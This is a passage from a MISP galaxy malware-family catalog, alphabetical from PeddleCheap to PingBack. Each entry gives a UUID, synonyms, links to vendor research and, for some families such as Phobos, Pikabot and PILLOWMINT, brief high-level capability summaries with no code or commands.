which can be used as unique global reference for PeddleCheap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap - webarchive
- https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/ - webarchive
- https://twitter.com/ESETresearch/status/1258353960781598721 - webarchive
- https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2# - webarchive
- https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pekraut
Internal MISP references
UUID 88f636b9-9c2e-4faf-ab83-b91009bf47fc
which can be used as unique global reference for Pekraut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pelmeni
Wrapper for Kazuar.
Internal MISP references
UUID 99a3e821-2080-47ae-abed-7694d5fa81e6
which can be used as unique global reference for Pelmeni
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Penco
Internal MISP references
UUID a2fd9b8a-826d-4df5-9a29-d61a8456d086
which can be used as unique global reference for Penco
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PennyWise Stealer
Internal MISP references
UUID c222def2-0f1f-4c74-9e37-757e964ff3c6
which can be used as unique global reference for PennyWise Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Peppy RAT
Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates with its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates with its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.
Internal MISP references
UUID 49321579-9dfe-45c6-80df-79467e4af65d
which can be used as unique global reference for Peppy RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PetrWrap
The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.
Internal MISP references
UUID 82ed8fae-552e-407b-b3fc-f617b7a8f996
which can be used as unique global reference for PetrWrap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/ - webarchive
- https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Petya
Internal MISP references
UUID 34c9dbaa-97ac-4e1e-9eca-b7c492d67efc
which can be used as unique global reference for Petya
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.petya - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://blogs.blackberry.com/en/2016/07/petya-and-mischa-for-all-part-ii-theyre-here - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/ - webarchive
- https://securelist.com/petya-the-two-in-one-trojan/74609/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://blog.avast.com/inside-petya-and-mischa-ransomware - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/ - webarchive
- https://www.malwarebytes.com/blog/news/2016/06/petya-and-mischa-ransomware-duet-p2 - webarchive
- https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html - webarchive
- https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/ - webarchive
- https://blogs.blackberry.com/en/2016/05/petya-and-mischa-for-all-the-raas-boom-expands-to-include-the-petya-mischa-combo - webarchive
- https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pgift
Information gathering and downloading tool used to deliver second-stage malware to the infected system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pgift.
Known Synonyms |
---|
ReRol |
Internal MISP references
UUID add29684-94b7-4c75-a43b-d039c4b76158
which can be used as unique global reference for pgift
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PhanDoor
Internal MISP references
UUID 3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c
which can be used as unique global reference for PhanDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor - webarchive
- https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phemedrone Stealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phemedrone Stealer.
Known Synonyms |
---|
Ov3r_Stealer |
Internal MISP references
UUID 13c5f597-d7e4-41c7-8143-060a024a9cac
which can be used as unique global reference for Phemedrone Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer - webarchive
- https://thehackernews.com/2024/02/beware-fake-facebook-job-ads-spreading.html?m=1 - webarchive
- https://spycloud.com/blog/phemedrone-stealer/ - webarchive
- https://www.splunk.com/en_us/blog/security/unveiling-phemedrone-stealer-threat-analysis-and-detections.html - webarchive
- https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html - webarchive
- https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf - webarchive
- https://github.com/nullixx/Phemedrone-Stealer/blob/master/README.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Philadephia Ransom
Internal MISP references
UUID f2a10bec-4783-4cfc-8e93-acd3c12a517d
which can be used as unique global reference for Philadephia Ransom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/ - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html - webarchive
- https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phobos
MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost-efficient dissemination vector for threat groups.
Internal MISP references
UUID d061daca-4415-4b3e-9034-231e37857eed
which can be used as unique global reference for Phobos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos - webarchive
- https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/ - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://securelist.com/cis-ransomware/104452/ - webarchive
- https://twitter.com/rivitna2/status/1674718854549831681 - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2023/11/23/unveiling-the-deceptive-dance-phobos-ransomware-masquerading-as-vx-underground - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware - webarchive
- https://blogs.blackberry.com/en/2021/11/zebra2104 - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/ - webarchive
- https://cert.pl/en/posts/2023/02/breaking-phobos/ - webarchive
- https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html - webarchive
- https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/ - webarchive
- https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.pcrisk.com/removal-guides/29391-force-ransomware - webarchive
- https://www.s-rminform.com/latest-insights/cyber-threat-advisory-phobos-ransomware-launches-new-leak-site-and-pivots-towards-extortion - webarchive
- https://www.dnsc.ro/vezi/document/alert-backmydata-ransomware-eng-pdf - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/ - webarchive
- https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/ - webarchive
- https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-the-backmydata-ransomware-used-to-attack-hospitals-in-romania/ - webarchive
- https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/ - webarchive
- https://circleid.com/posts/20240530-a-dns-investigation-of-the-phobos-ransomware-8base-attack - webarchive
- https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phoenix Keylogger
Keylogger, information stealer.
Internal MISP references
UUID 601ea680-68ec-43c9-ba20-88eaaefe8818
which can be used as unique global reference for Phoenix Keylogger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/ - webarchive
- https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass - webarchive
- https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phoenix Locker
Internal MISP references
UUID 58aff639-0eda-4a80-9fe8-22e0498af728
which can be used as unique global reference for Phoenix Locker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phonk
Internal MISP references
UUID e0aa3f91-59d6-4344-bcc5-d602aaab21f9
which can be used as unique global reference for Phonk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PHOREAL
Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates with a list of four preconfigured C2 servers via ICMP on port 53.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PHOREAL.
Known Synonyms |
---|
Rizzo |
Internal MISP references
UUID 3aa6fd62-9b91-4136-af0e-08af7962ba4b
which can be used as unique global reference for PHOREAL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf - webarchive
- https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phorpiex
Proofpoint describes Phorpiex/Trik as an SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phorpiex.
Known Synonyms |
---|
Trik |
phorphiex |
Internal MISP references
UUID 9759f99b-6d6c-4633-aa70-cb1d2bacc540
which can be used as unique global reference for Phorpiex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex - webarchive
- https://bin.re/blog/phorpiex/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows - webarchive
- https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/ - webarchive
- https://research.checkpoint.com/2019/phorpiex-breakdown/ - webarchive
- https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet - webarchive
- https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html - webarchive
- https://twitter.com/CPResearch/status/1447852018794643457 - webarchive
- https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/ - webarchive
- https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/ - webarchive
- https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/ - webarchive
- https://www.johannesbader.ch/2016/02/phorpiex/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PHOTOFORK
PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.
Internal MISP references
UUID 10d3dd4b-8858-4131-bcf0-60982f36e43d
which can be used as unique global reference for PHOTOFORK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PHOTOLITE
PHOTOLITE is the lite version of the GZIPLOADER with limited capabilities, i.e. for example it does not have any functionality to exfiltrate the host information. This new variant was observed as a follow-on payload in a TA542 Emotet campaign back in November '22. It contains a static URL to download a "Bot Pack" file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.
Internal MISP references
UUID e4609860-99f9-47c9-9e36-350611466f3c
which can be used as unique global reference for PHOTOLITE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return - webarchive
- https://www.intrinsec.com/emotet-returns-and-deploys-loaders/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PhotoLoader
A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhotoLoader.
Known Synonyms |
---|
GZIPLOADER |
Internal MISP references
UUID 3418ca80-73d9-49ab-836a-98230a83c67d
which can be used as unique global reference for PhotoLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid - webarchive
- https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns - webarchive
- https://www.silentpush.com/blog/malicious-infrastructure-as-a-service - webarchive
- https://leandrofroes.github.io/posts/Reversing-a-recent-IcedID-Crypter/ - webarchive
- https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/ - webarchive
- https://isc.sans.edu/diary/29740 - webarchive
- https://www.team-cymru.com/post/from-chile-with-malware - webarchive
- https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes - webarchive
- https://blog.talosintelligence.com/following-the-lnk-metadata-trail - webarchive
- https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary - webarchive
- https://isc.sans.edu/diary/28636 - webarchive
- https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://www.silentpush.com/blog/icedid-command-and-control-infrastructure - webarchive
- https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf - webarchive
- https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/ - webarchive
- https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns - webarchive
- https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1 - webarchive
- https://www.elastic.co/security-labs/unpacking-icedid - webarchive
- https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/ - webarchive
- https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid - webarchive
- https://0x0d4y.blog/icedid-technical-analysis/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html - webarchive
- https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing - webarchive
- https://www.youtube.com/watch?v=4j8t9kFLFIY - webarchive
- https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - webarchive
- https://twitter.com/felixw3000/status/1521816045769662468 - webarchive
- https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PicassoLoader
Internal MISP references
UUID 77223b00-0299-416b-9b91-fa0cf1306cd3
which can be used as unique global reference for PicassoLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.picasso_loader - webarchive
- https://cert.gov.ua/article/5098518 - webarchive
- https://socprime.com/blog/picassoloader-and-cobalt-strike-beacon-detection-uac-0057-aka-ghostwriter-hacking-group-attacks-the-ukrainian-leading-military-educational-institution/ - webarchive
- https://socprime.com/blog/uac-0057-attack-detection-a-surge-in-adversary-activity-distributing-picassoloader-and-cobalt-strike-beacon/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PICKPOCKET
PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.
Internal MISP references
UUID 2eb298de-e14b-46c1-a45f-26ae0d2c4003
which can be used as unique global reference for PICKPOCKET
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PIEHOP
According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user-supplied remote MSSQL server for uploading files and issuing remote commands to an RTU. PIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.
Internal MISP references
UUID 2b025b03-9241-4fe4-b691-46c7bace87e4
which can be used as unique global reference for PIEHOP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pierogi
Internal MISP references
UUID 2bda00e8-e6a7-448d-8dfa-4f2276230e8b
which can be used as unique global reference for Pierogi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor - webarchive
- https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pikabot
Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.
Internal MISP references
UUID 992151e9-2d4d-4621-9a2e-f2219f97e55b
which can be used as unique global reference for Pikabot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot - webarchive
- https://blog.cyber5w.com/2024/02/25/pikabotloader/ - webarchive
- https://www.youtube.com/watch?v=k2rH0ISuMwE - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://research.openanalysis.net/pikabot/yara/config/loader/2023/02/26/pikabot.html - webarchive
- https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html - webarchive
- https://www.elastic.co/security-labs/pikabot-i-choose-you - webarchive
- https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/ - webarchive
- https://research.openanalysis.net/pikabot/debugging/string%20decryption/emulation/memulator/2023/11/19/new-pikabot-strings.html - webarchive
- https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/ - webarchive
- https://blog.cyber5w.com/malware%20analysis/PikabotLoader/ - webarchive
- https://www.malware-traffic-analysis.net/2023/10/03/index.html - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.hivepro.com/wp-content/uploads/2023/05/Pikabot-A-Stealthy-Backdoor-with-Ingenious-Evasion-Tactics_TA2023246.pdf - webarchive
- https://blog.krakz.fr/notes/syswhispers2/ - webarchive
- https://blog.securityonion.net/2023/09/quick-malware-analysis-pikabot.html - webarchive
- https://d01a.github.io/pikabot/ - webarchive
- https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads - webarchive
- https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/ - webarchive
- https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/ - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/Pikabot/Pikabot%20Loader.md - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.vmray.com/cyber-security-blog/why-your-edr-let-pikabot-jump-through/ - webarchive
- https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscation - webarchive
- https://www.zscaler.com/blogs/security-research/d-evolution-pikabot - webarchive
- https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398 - webarchive
- https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/ - webarchive
- https://www.youtube.com/watch?v=lBuZ7cvl24Y - webarchive
- https://blog.pulsedive.com/pikabot/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PILLOWMINT
According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged). It contains additional backdoor capabilities, including running processes, downloading and executing files (T1105: Remote File Copy), and downloading and injecting DLLs (T1055: Process Injection). It communicates with a command and control (C2) server over HTTP using AES-encrypted messages (T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol).
Internal MISP references
UUID dec78ec5-f02d-461f-a8cc-cd4e80099e38
which can be used as unique global reference for PILLOWMINT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PinchDuke
According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.
Internal MISP references
UUID d837fc8e-1298-4911-9cfd-eb434a25bf3a
which can be used as unique global reference for PinchDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PINEGROVE
Internal MISP references
UUID 8c9289d7-3e16-46dd-9506-187a42206cba
which can be used as unique global reference for PINEGROVE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PingBack
